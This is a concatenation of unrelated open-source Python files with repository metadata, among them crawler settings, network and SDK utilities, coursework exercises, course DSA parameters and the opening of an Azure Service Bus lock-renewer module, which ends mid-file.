b00ab8ba872307d2333753f04e741547c90f2cd0 | 2793721e5cbfccfedac75556e34dba22999530d7 | /Data_Structures/Queue/venv/bin/easy_install-3.7 | 8f39f903e7eb3bb8428554ff85aff955f127983f | [] | no_license | iafjayoza/Python | 135e613d1d23c493b05a009843b40cbca6a1d318 | aaa05b0d655c8f0a47ced0100a844d99f852b2a4 | refs/heads/master | 2022-12-07T07:21:46.494885 | 2020-09-06T09:03:27 | 2020-09-06T09:03:27 | 282,707,082 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | 7 | #!/Users/jo049566/Desktop/Jay/Jay_Data/Study_Repo/Python/Projects/Queue/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"[email protected]"
] | |
746b0c743ffb8d49b2ff71cf870102d7d7279481 | 5cea76d53779d466f19a5cf0b51e003586cc4a7b | /py4ops/getip.py | e2bbe141b3b44d2c61828b6bf996715b6e854f17 | [] | no_license | evan886/python | 40152fdb4885876189580141abe27a983d04e04d | d33e996e93275f6b347ecc2d30f8efe05accd10c | refs/heads/master | 2021-06-28T12:35:10.793186 | 2021-05-26T14:33:40 | 2021-05-26T14:33:40 | 85,560,342 | 2 | 1 | null | 2017-10-11T05:31:06 | 2017-03-20T09:51:50 | JavaScript | UTF-8 | Python | false | false | 599 | py | #!/usr/bin/python
#-*- coding:utf-8 -*-
import socket
import fcntl
import struct
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
print get_ip_address('eth0')
'''
sending email needs this IP
>>> get_ip_address('eth0')
'38.113.228.130'
http://blog.csdn.net/heizistudio/article/details/38413739
Get the local machine's IP address with Python
http://www.pythonclub.org/python-network-application/get-ip-address
''' | [
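
# An alternative sketch that needs no interface name (assumption: outbound UDP
# is allowed; connect() on a UDP socket sends no packets, it only selects the
# interface used for the default route):
def get_ip_address_by_route():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(('8.8.8.8', 80))
    ip = s.getsockname()[0]
    s.close()
    return ip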
"[email protected]"
] | |
be3cab903221403283dcb433087d1d2770b819c1 | 2aec9c5e8c72b731d3abf22f2a407fe09c1cde09 | /SipopPolicyImg/SipopPolicyImg/settings.py | dc0ee7131688caeaf0e766dc8fe3b44d9a87787e | [] | no_license | jiangyg/ZWFproject | 8b24cc34970ae0a9c2a2b0039dc527c83a5862b5 | aa35bc59566d92721f23d2dd00b0febd268ac2dd | refs/heads/master | 2020-09-26T17:01:00.229380 | 2019-11-15T13:16:21 | 2019-11-15T13:16:21 | 226,297,631 | 0 | 1 | null | 2019-12-06T09:55:37 | 2019-12-06T09:55:36 | null | UTF-8 | Python | false | false | 2,169 | py | # Scrapy settings for SipopPolicyImg project
#
# For simplicity, this file contains only the most important settings by
# default. All the other settings are documented here:
#
# http://doc.scrapy.org/topics/settings.html
#
SPIDER_MODULES = ['SipopPolicyImg.spiders']
NEWSPIDER_MODULE = 'SipopPolicyImg.spiders'
ROBOTSTXT_OBEY = False
# USER_AGENT = 'scrapy-redis (+https://github.com/rolando/scrapy-redis)'
DUPEFILTER_CLASS = "scrapy_redis.dupefilter.RFPDupeFilter"
SCHEDULER = "scrapy_redis.scheduler.Scheduler"
SCHEDULER_PERSIST = True
SCHEDULER_QUEUE_CLASS = "scrapy_redis.queue.SpiderPriorityQueue"
#SCHEDULER_QUEUE_CLASS = "scrapy_redis.queue.SpiderQueue"
#SCHEDULER_QUEUE_CLASS = "scrapy_redis.queue.SpiderStack"
ITEM_PIPELINES = {
'SipopPolicyImg.pipelines.SipoppolicyPipeline': 300,
'scrapy_redis.pipelines.RedisPipeline': 400,
}
LOG_LEVEL = 'DEBUG'
DOWNLOADER_MIDDLEWARES = {
'SipopPolicyImg.middlewares.RandMiddleware': 543,
'scrapy.contrib.downloadermiddleware.useragent.UserAgentMiddleware': None,
}
REDIS_HOST = '127.0.0.1' # can also be changed to localhost as needed
REDIS_PORT = 6379
REDIS_PARAMS = {
'db': 15,
}
# Introduce an artificial delay to make use of parallelism and to speed up the
# crawl.
DOWNLOAD_DELAY = 1
CONCURRENT_REQUESTS = 8
RETRY_ENABLED = True # retry middleware; defaults to True (enabled)
RETRY_HTTP_CODES = [302] # HTTP status codes to retry; other errors are discarded
RETRY_TIMES = 10 # number of retry attempts
AUTOTHROTTLE_ENABLED = True # AutoThrottle (automatic rate limiting) extension
AUTOTHROTTLE_START_DELAY = 5.0
# initial download delay (in seconds)
AUTOTHROTTLE_MAX_DELAY = 60.0
# maximum download delay to set under high latency (in seconds)
AUTOTHROTTLE_DEBUG = True
# enable AutoThrottle debug mode, which shows stats for every response received
# so the parameters can be tuned in real time
AUTOTHROTTLE_TARGET_CONCURRENCY = 10
# number of requests Scrapy should send in parallel to the remote site; set it
# higher to increase throughput and load on the remote server, lower to make
# the crawler more conservative and polite
HTTPERROR_ALLOWED_CODES = [302, 500, 502, 404, 403, 503]
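
# A sketch of what the RandMiddleware referenced in DOWNLOADER_MIDDLEWARES
# might look like (the real implementation lives in
# SipopPolicyImg/middlewares.py; everything below is an assumption):
#
#   import random
#
#   class RandMiddleware(object):
#       user_agents = [
#           "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
#           "Mozilla/5.0 (X11; Linux x86_64)",
#       ]
#
#       def process_request(self, request, spider):
#           # pick a random User-Agent for each outgoing request
#           request.headers["User-Agent"] = random.choice(self.user_agents)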
| [
"[email protected]"
] | |
3aafacd2c3e9f63889114636ae310d1c6ca37f74 | f7d343efc7b48818cac4cf9b98423b77345a0067 | /training/rotateArray.py | e9806b40cb7999c3ceb19bcba0f938c7c66662d9 | [] | no_license | vijaymaddukuri/python_repo | 70e0e24d0554c9fac50c5bdd85da3e15c6f64e65 | 93dd6d14ae4b0856aa7c6f059904cc1f13800e5f | refs/heads/master | 2023-06-06T02:55:10.393125 | 2021-06-25T16:41:52 | 2021-06-25T16:41:52 | 151,547,280 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | n=[1,2,3,4,5,6,7]
k=3
def rotateArray(n, k):
    k = k % len(n)  # guard against k larger than the list length
    new = n[k:] + n[:k]
    return new
newArray = rotateArray(n, k)
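# For comparison, a standard-library sketch: deque.rotate(-k) performs the
# same left rotation as the slicing above.
from collections import deque
d = deque(n)
d.rotate(-k)
print(list(d))  # same result as newArray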
print(newArray) | [
"[email protected]"
] | |
09b541231ca7b26b86b963b1d56d20ded60d96a8 | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/artificial/transf_Anscombe/trend_ConstantTrend/cycle_12/ar_/test_artificial_128_Anscombe_ConstantTrend_12__100.py | 90590116d599656197e31e656d41ca810bd1f95f | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 269 | py | import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "ConstantTrend", cycle_length = 12, transform = "Anscombe", sigma = 0.0, exog_count = 100, ar_order = 0); | [
"[email protected]"
] | |
62476df0b7f7d2e336afdd3147f644b538346cf3 | 6e9c127bd6705a8b92f240ca663163504b86cd81 | /elecsim/reinforcement_learning/__init__.py | c81092b6f862e68895065cc1c34baacd81f097c9 | [
"MIT"
] | permissive | alexanderkell/elecsim | 239ffd539d1b04f24186ddaae20ac4ce6b258c03 | df9ea14cbc8dd3fd4302be9274cb6ea61c0cdb10 | refs/heads/master | 2023-04-06T10:03:35.367411 | 2023-04-05T16:52:16 | 2023-04-05T16:52:16 | 124,561,430 | 36 | 10 | MIT | 2022-12-08T01:57:45 | 2018-03-09T15:55:53 | Jupyter Notebook | UTF-8 | Python | false | false | 229 | py | """
File name: __init__.py
Date created: 01/03/2019
Feature: #Enter feature description here
"""
__author__ = "Alexander Kell"
__copyright__ = "Copyright 2018, Alexander Kell"
__license__ = "MIT"
__email__ = "[email protected]"
| [
"[email protected]"
] | |
53de0dc2fc3ca23f7489ba815b0d47e166c0a41d | 54a0b86d4c3f731487ad4470fb365907970472e6 | /P1/studentparameters/Project1_Parameters_gg.py | 84f2505c0e7969acde0d86286867f8a7f41dcddc | [] | no_license | samiurrahman98/ece458-computer-security | 26aa46e174b0bf77f748e6451dd2e0e4183feebd | cf79430b98e3679ffcd687a0c96b5e979187e1e3 | refs/heads/master | 2022-11-25T01:26:36.874094 | 2020-07-31T21:24:53 | 2020-07-31T21:24:53 | 280,979,038 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,771 | py | # Select the file name that matches your first two letters of your last name on Learn
# Read those parameters as your ECE458 project 1 parameters
# p,q,g are DSA domain parameters, sk_i (secret keys) are used in each signature and verification
p=16158504202402426253991131950366800551482053399193655122805051657629706040252641329369229425927219006956473742476903978788728372679662561267749592756478584653187379668070077471640233053267867940899762269855538496229272646267260199331950754561826958115323964167572312112683234368745583189888499363692808195228055638616335542328241242316003188491076953028978519064222347878724668323621195651283341378845128401263313070932229612943555693076384094095923209888318983438374236756194589851339672873194326246553955090805398391550192769994438594243178242766618883803256121122147083299821412091095166213991439958926015606973543
q=13479974306915323548855049186344013292925286365246579443817723220231
g=9891663101749060596110525648800442312262047621700008710332290803354419734415239400374092972505760368555033978883727090878798786527869106102125568674515087767296064898813563305491697474743999164538645162593480340614583420272697669459439956057957775664653137969485217890077966731174553543597150973233536157598924038645446910353512441488171918287556367865699357854285249284142568915079933750257270947667792192723621634761458070065748588907955333315440434095504696037685941392628366404344728480845324408489345349308782555446303365930909965625721154544418491662738796491732039598162639642305389549083822675597763407558360
sk1=4238046188863111196134523391567180673009409153722853144581286972290
sk2=5251810960028969703460342961462449674500434928936370393443116963182
sk3=1290595980181313010068948362172310388515606811911036234145294356283
| [
"[email protected]"
] | |
2b8a2244e4e8b8f8a97d5cbe7d0d579cd8508d15 | bc1525a4e85e49829ccbf7cfc9db6881790fa3a7 | /pyUbiForge/ACU/type_readers/788BAA0D.py | cf65a21e511965a7960ee2750c94202ea6eb269d | [] | no_license | christianbethel1993/ACExplorer | 5183228c1c1beb5d7a3c768f5c8345e00e38f82f | f343de8925e0ca08aff7d2719c5e885dc3e503ac | refs/heads/master | 2023-03-26T13:57:15.390140 | 2019-07-02T12:05:23 | 2019-07-02T12:05:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | from pyUbiForge.misc.file_object import FileObjectDataWrapper
from pyUbiForge.misc.file_readers import BaseReader
class Reader(BaseReader):
file_type = '788BAA0D'
def __init__(self, file_object_data_wrapper: FileObjectDataWrapper):
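        # Reads 16 float32 values -- a 4x4 matrix (likely a transform).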
for _ in range(4):
for _ in range(4):
file_object_data_wrapper.read_float_32()
file_object_data_wrapper.out_file_write('\n')
| [
"[email protected]"
] | |
1ccbc85a8f20324d99f2b2eb30db1d21ed445f07 | 1f51c4e89a71ea3fcc2cc921613aacc19e078b69 | /16_Cleaning Data in Python [Part - 1]/02_Text and categorical data problems/06_Removing titles and taking names.py | e3da04a5987946e045f113e8723ed5864fb6283b | [
"MIT"
] | permissive | CodeHemP/CAREER-TRACK-Data-Scientist-with-Python | 871bafbd21c4e754beba31505965572dd8457adc | 13ebb10cf9083343056d5b782957241de1d595f9 | refs/heads/main | 2023-03-26T08:43:37.054410 | 2021-03-22T15:08:12 | 2021-03-22T15:08:12 | 471,015,287 | 1 | 0 | MIT | 2022-03-17T13:52:32 | 2022-03-17T13:52:31 | null | UTF-8 | Python | false | false | 1,407 | py | '''
06 - Removing titles and taking names
While collecting survey respondent metadata in the airlines DataFrame,
the full name of respondents was saved in the full_name column. However,
upon closer inspection, you found that many of the names are
prefixed by honorifics such as "Dr.", "Mr.", "Ms." and "Miss".
Your ultimate objective is to create two new columns named first_name and
last_name, containing the first and last names of respondents respectively.
Before doing so however, you need to remove honorifics.
The airlines DataFrame is in your environment, alongside pandas as pd.
Instructions:
- Remove "Dr.", "Mr.", "Miss" and "Ms." from full_name by replacing them with
an empty string "" in that order.
- Run the assert statement using .str.contains() that tests whether full_name
still contains any of the honorifics.
'''
# Replace "Dr." with empty string ""
airlines['full_name'] = airlines['full_name'].str.replace("Dr.", "")
# Replace "Mr." with empty string ""
airlines['full_name'] = airlines['full_name'].str.replace("Mr.", "")
# Replace "Miss" with empty string ""
airlines['full_name'] = airlines['full_name'].str.replace("Miss", "")
# Replace "Ms." with empty string ""
airlines['full_name'] = airlines['full_name'].str.replace("Ms.", "")
# Assert that full_name has no honorifics
assert airlines['full_name'].str.contains('Ms.|Mr.|Miss|Dr.').any() == False
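
# The prose above names the ultimate objective of splitting full_name into
# first and last names. A minimal sketch, not part of the original exercise,
# assuming names are "First Last" once the honorifics are stripped:
airlines['first_name'] = airlines['full_name'].str.split().str[0]
airlines['last_name'] = airlines['full_name'].str.split().str[-1]
# Note: .str.replace treats the pattern as a regular expression by default in
# older pandas, so "Dr." also matches "Drx"; passing regex=False (supported in
# newer pandas) avoids that.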
| [
"[email protected]"
] | |
3cd902ce5209b6c7863f07b1602b49859de1031e | 4d2475135f5fc9cea73572b16f59bfdc7232e407 | /prob224_basic_calculator.py | e775df1d9d3e1655e6652d7439cd899e9757ac9c | [] | no_license | Hu-Wenchao/leetcode | 5fa0ae474aadaba372756d234bc5ec397c8dba50 | 31b2b4dc1e5c3b1c53b333fe30b98ed04b0bdacc | refs/heads/master | 2021-06-24T04:57:45.340001 | 2017-06-17T02:33:09 | 2017-06-17T02:33:09 | 45,328,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 954 | py | """
Implement a basic calculator to evaluate a simple expression string.
The expression string may contain open ( and closing parentheses ),
the plus + or minus sign -, non-negative integers and empty spaces .
You may assume that the given expression is always valid.
Some examples:
"1 + 1" = 2
" 2-1 + 2 " = 3
"(1+(4+5+2)-3)+(6+8)" = 23
"""
class Solution(object):
def calculate(self, s):
"""
:type s: str
:rtype: int
"""
        total = 0
        # signs is a stack of pending signs: the top element is the sign to
        # apply to the next number (it starts with two 1s so the first pop
        # still leaves a base sign on the stack).
        i, signs = 0, [1, 1]
        while i < len(s):
            c = s[i]
            if c.isdigit():
                # Consume the whole (possibly multi-digit) number.
                start = i
                while i < len(s) and s[i].isdigit():
                    i += 1
                total += signs.pop() * int(s[start:i])
                continue
            if c in '+-(':
                # Push the sign for the next term; '-' flips the current sign,
                # '(' simply carries it into the new scope.
                signs.append(signs[-1] * (1, -1)[c == '-'])
            elif c == ')':
                signs.pop()
            i += 1
        return total
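
if __name__ == "__main__":
    # Quick check against the examples in the docstring above.
    sol = Solution()
    print(sol.calculate("1 + 1"))                # 2
    print(sol.calculate(" 2-1 + 2 "))            # 3
    print(sol.calculate("(1+(4+5+2)-3)+(6+8)"))  # 23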
| [
"[email protected]"
] | |
78cc2c0e6ce7233a114f720346695cd17917852a | f6c051b15e29fbf1501499d5551c0d9237da0852 | /order/migrations/0008_auto_20210108_0304.py | 8fa64fe7e7a2df8ee6ded7dac0bf581c23033732 | [] | no_license | Deepjyoti13/eCommerce | 8e672d2c4b6f708ef4ac1b66521ce72d2fe2cc39 | b0745b8c3a410f7ee8182496c556229748fd3265 | refs/heads/master | 2023-02-25T04:00:47.068320 | 2021-01-24T19:21:13 | 2021-01-24T19:21:13 | 321,396,947 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 560 | py | # Generated by Django 3.1.4 on 2021-01-07 21:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('order', '0007_order_tracking'),
]
operations = [
migrations.AlterField(
model_name='order',
name='status',
field=models.CharField(choices=[('New', 'New'), ('Accepted', 'Accepted'), ('Preparing', 'Preparing'), ('On Shipping', 'On Shipping'), ('Completed', 'Completed'), ('Canceled', 'Canceled')], default='New', max_length=50),
),
]
| [
"[email protected]"
] | |
f1c57d57d4175a117e64f2370c9b2da75032aefd | 5cea76d53779d466f19a5cf0b51e003586cc4a7b | /project/chapter29squish/config.py | c0a9c78f74009e17e69d5662bf33698d71ab2bc1 | [] | no_license | evan886/python | 40152fdb4885876189580141abe27a983d04e04d | d33e996e93275f6b347ecc2d30f8efe05accd10c | refs/heads/master | 2021-06-28T12:35:10.793186 | 2021-05-26T14:33:40 | 2021-05-26T14:33:40 | 85,560,342 | 2 | 1 | null | 2017-10-11T05:31:06 | 2017-03-20T09:51:50 | JavaScript | UTF-8 | Python | false | false | 713 | py | # Configuration file for Squish
# -----------------------------
# Feel free to modify the configuration variables below to taste.
# If the game is too fast or too slow, try to modify the speed
# variables.
# Change these to use other images in the game:
banana_image = 'banana.png'
weight_image = 'weight.png'
splash_image = 'weight.png'
#splash_image = 'banana.png'
# Change these to affect the general appearance:
screen_size = 800, 600
background_color = 255, 255, 255
margin = 30
full_screen = 0
#full_screen = 1
#font_size = 68
font_size = 48
# These affect the behavior of the game:
drop_speed = 1
banana_speed = 1
speed_increase = 1
weights_per_level = 10
banana_pad_top = 40
banana_pad_side = 20
| [
"[email protected]"
] | |
9fcb80ebf6ba49d19469342df5512714fae0445e | c7cbbd4b1c1e281cef5f4a0c4e3d4a97cee2241e | /froide/accesstoken/views.py | f7bfb75707d18ad131e30d2a36f10fd8cc21fc26 | [
"MIT"
] | permissive | manonthemat/froide | 078cf78a6eb35226512c0bdfa2ac9043bcc81ad9 | 698c49935eaf2e922f3c9f6a46af0fd545ccbbbb | refs/heads/master | 2020-08-14T08:19:36.215473 | 2019-10-14T19:43:16 | 2019-10-14T19:43:16 | 215,129,869 | 0 | 0 | MIT | 2019-10-14T19:35:49 | 2019-10-14T19:35:49 | null | UTF-8 | Python | false | false | 669 | py | from django.views.decorators.http import require_POST
from django.utils.translation import ugettext_lazy as _
from django.contrib import messages
from froide.helper.utils import render_403, get_redirect
from .forms import ResetTokenForm
@require_POST
def reset_token(request):
if not request.user.is_authenticated:
return render_403(request)
form = ResetTokenForm(data=request.POST, user=request.user)
if form.is_valid():
message = form.save()
messages.add_message(request, messages.SUCCESS, message)
else:
messages.add_message(request, messages.ERROR, _('Failed to reset token.'))
return get_redirect(request)
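
# Hypothetical wiring sketch (the real URL configuration lives elsewhere in
# froide; the route below is an assumption):
#
#   from django.urls import path
#   from .views import reset_token
#
#   urlpatterns = [
#       path("reset-token/", reset_token, name="accesstoken-reset"),
#   ]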
| [
"[email protected]"
] | |
990b85fea581c3710a827f71f87d0f2bc9447d5f | ef54d37f8a3303013ca7469871a320d303957ed7 | /robo4.2/4.2/lib/python2.7/site-packages/robot/libraries/dialogs_py.py | 252b6948049aa0b01ab2f54bdf4e68c57aabb39a | [] | no_license | richa92/Jenkin_Regression_Testing | d18badfcf16bda682dfe7bcbbd66f54a9a27a58d | 24a74926170cbdfafa47e972644e2fe5b627d8ff | refs/heads/master | 2020-07-12T10:01:59.099137 | 2019-08-27T12:14:53 | 2019-08-27T12:14:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,703 | py | # Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from threading import currentThread
import time
try:
    from Tkinter import (Button, Entry, Frame, Label, Listbox, TclError,
                         Toplevel, Tk, BOTH, END, LEFT, W)
except ImportError:
    from tkinter import (Button, Entry, Frame, Label, Listbox, TclError,
                         Toplevel, Tk, BOTH, END, LEFT, W)
class _TkDialog(Toplevel):
_left_button = 'OK'
_right_button = 'Cancel'
def __init__(self, message, value=None, **extra):
self._prevent_execution_with_timeouts()
self._parent = self._get_parent()
Toplevel.__init__(self, self._parent)
self._initialize_dialog()
self._create_body(message, value, **extra)
self._create_buttons()
self._result = None
def _prevent_execution_with_timeouts(self):
if 'linux' not in sys.platform \
and currentThread().getName() != 'MainThread':
raise RuntimeError('Dialogs library is not supported with '
'timeouts on Python on this platform.')
def _get_parent(self):
parent = Tk()
parent.withdraw()
return parent
def _initialize_dialog(self):
self.title('Robot Framework')
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self._close)
self.bind("<Escape>", self._close)
self.minsize(250, 80)
self.geometry("+%d+%d" % self._get_center_location())
self._bring_to_front()
def grab_set(self, timeout=30):
maxtime = time.time() + timeout
while time.time() < maxtime:
try:
                # Fails at least on Linux if a mouse button is held down.
return Toplevel.grab_set(self)
except TclError:
pass
raise RuntimeError('Failed to open dialog in %s seconds. One possible '
                           'reason is a mouse button being held down.' % timeout)
def _get_center_location(self):
x = (self.winfo_screenwidth() - self.winfo_reqwidth()) // 2
y = (self.winfo_screenheight() - self.winfo_reqheight()) // 2
return x, y
def _bring_to_front(self):
self.attributes('-topmost', True)
self.attributes('-topmost', False)
def _create_body(self, message, value, **extra):
frame = Frame(self)
Label(frame, text=message, anchor=W, justify=LEFT, wraplength=800).pack(fill=BOTH)
selector = self._create_selector(frame, value, **extra)
if selector:
selector.pack(fill=BOTH)
selector.focus_set()
frame.pack(padx=5, pady=5, expand=1, fill=BOTH)
def _create_selector(self, frame, value):
return None
def _create_buttons(self):
frame = Frame(self)
self._create_button(frame, self._left_button,
self._left_button_clicked)
self._create_button(frame, self._right_button,
self._right_button_clicked)
frame.pack()
def _create_button(self, parent, label, callback):
if label:
button = Button(parent, text=label, width=10, command=callback)
button.pack(side=LEFT, padx=5, pady=5)
def _left_button_clicked(self, event=None):
if self._validate_value():
self._result = self._get_value()
self._close()
def _validate_value(self):
return True
def _get_value(self):
return None
def _close(self, event=None):
# self.destroy() is not enough on Linux
self._parent.destroy()
def _right_button_clicked(self, event=None):
self._result = self._get_right_button_value()
self._close()
def _get_right_button_value(self):
return None
def show(self):
self.wait_window(self)
return self._result
class MessageDialog(_TkDialog):
_right_button = None
class InputDialog(_TkDialog):
def __init__(self, message, default='', hidden=False):
_TkDialog.__init__(self, message, default, hidden=hidden)
def _create_selector(self, parent, default, hidden):
self._entry = Entry(parent, show='*' if hidden else '')
self._entry.insert(0, default)
self._entry.select_range(0, END)
return self._entry
def _get_value(self):
return self._entry.get()
class SelectionDialog(_TkDialog):
def __init__(self, message, values):
_TkDialog.__init__(self, message, values)
def _create_selector(self, parent, values):
self._listbox = Listbox(parent)
for item in values:
self._listbox.insert(END, item)
self._listbox.config(width=0)
return self._listbox
def _validate_value(self):
return bool(self._listbox.curselection())
def _get_value(self):
return self._listbox.get(self._listbox.curselection())
class PassFailDialog(_TkDialog):
_left_button = 'PASS'
_right_button = 'FAIL'
def _get_value(self):
return True
def _get_right_button_value(self):
return False
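
if __name__ == '__main__':
    # A minimal smoke test (assumption: a display is available). Each dialog
    # blocks until closed; show() returns the chosen value.
    print(MessageDialog('Hello from Robot Framework').show())
    print(InputDialog('Enter your name:', 'default').show())
    print(SelectionDialog('Pick one:', ['cat', 'dog']).show())
    print(PassFailDialog('Did it work?').show())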
| [
"[email protected]"
] | |
35dfe86db227e3ebcc4020419a9b458da4804d07 | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flashblade/FB_2_8/models/quota_setting_response.py | 911d109050831d4426d6f40b7851420fcdcd0f2a | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 3,181 | py | # coding: utf-8
"""
FlashBlade REST API
A lightweight client for FlashBlade REST API 2.8, developed by Pure Storage, Inc. (http://www.purestorage.com/).
OpenAPI spec version: 2.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flashblade.FB_2_8 import models
class QuotaSettingResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'items': 'list[QuotaSetting]'
}
attribute_map = {
'items': 'items'
}
required_args = {
}
def __init__(
self,
items=None, # type: List[models.QuotaSetting]
):
"""
Keyword args:
items (list[QuotaSetting]): A list of quota settings objects.
"""
if items is not None:
self.items = items
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `QuotaSettingResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
return None
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(QuotaSettingResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, QuotaSettingResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
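
if __name__ == "__main__":
    # Minimal sketch: build an empty response and round-trip it through the
    # helpers above (QuotaSetting items are omitted because their constructor
    # is defined elsewhere in this SDK).
    resp = QuotaSettingResponse(items=[])
    print(resp.to_dict())  # -> {'items': []}
    print(resp.to_str())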
| [
"[email protected]"
] | |
0834a5b08c86116c058a156d90a1ff41c16fbe22 | aa0270b351402e421631ebc8b51e528448302fab | /sdk/servicebus/azure-servicebus/azure/servicebus/aio/_async_auto_lock_renewer.py | 0bc36d7b473330ffd0a344b4b93c2976c7fb5cbd | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 10,532 | py | # ------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# -------------------------------------------------------------------------
import asyncio
import logging
import datetime
from typing import Optional, Iterable, Any, Union, Callable, Awaitable, List
from .._common.message import ServiceBusReceivedMessage
from ._servicebus_session_async import ServiceBusSession
from ._servicebus_receiver_async import ServiceBusReceiver
from .._common.utils import (
get_renewable_start_time,
utc_now,
get_renewable_lock_duration,
)
from .._common.auto_lock_renewer import SHORT_RENEW_OFFSET, SHORT_RENEW_SCALING_FACTOR
from ._async_utils import get_dict_with_loop_if_needed
from ..exceptions import AutoLockRenewTimeout, AutoLockRenewFailed, ServiceBusError
Renewable = Union[ServiceBusSession, ServiceBusReceivedMessage]
AsyncLockRenewFailureCallback = Callable[
[Renewable, Optional[Exception]], Awaitable[None]
]
_log = logging.getLogger(__name__)
class AutoLockRenewer:
"""Auto lock renew.
An asynchronous AutoLockRenewer handler for renewing the lock
tokens of messages and/or sessions in the background.
:param max_lock_renewal_duration: A time in seconds that locks registered to this renewer
should be maintained for. Default value is 300 (5 minutes).
:type max_lock_renewal_duration: float
:param on_lock_renew_failure: A callback may be specified to be called when the lock is lost on the renewable
that is being registered. Default value is None (no callback).
:type on_lock_renew_failure: Optional[LockRenewFailureCallback]
.. admonition:: Example:
.. literalinclude:: ../samples/async_samples/sample_code_servicebus_async.py
:start-after: [START auto_lock_renew_message_async]
:end-before: [END auto_lock_renew_message_async]
:language: python
:dedent: 4
:caption: Automatically renew a message lock
.. literalinclude:: ../samples/async_samples/sample_code_servicebus_async.py
:start-after: [START auto_lock_renew_session_async]
:end-before: [END auto_lock_renew_session_async]
:language: python
:dedent: 4
:caption: Automatically renew a session lock
"""
def __init__(
self,
max_lock_renewal_duration: float = 300,
on_lock_renew_failure: Optional[AsyncLockRenewFailureCallback] = None,
loop: Optional[asyncio.AbstractEventLoop] = None,
) -> None:
self._internal_kwargs = get_dict_with_loop_if_needed(loop)
self._shutdown = asyncio.Event()
self._futures: List[asyncio.Future] = []
self._sleep_time = 1
self._renew_period = 10
self._on_lock_renew_failure = on_lock_renew_failure
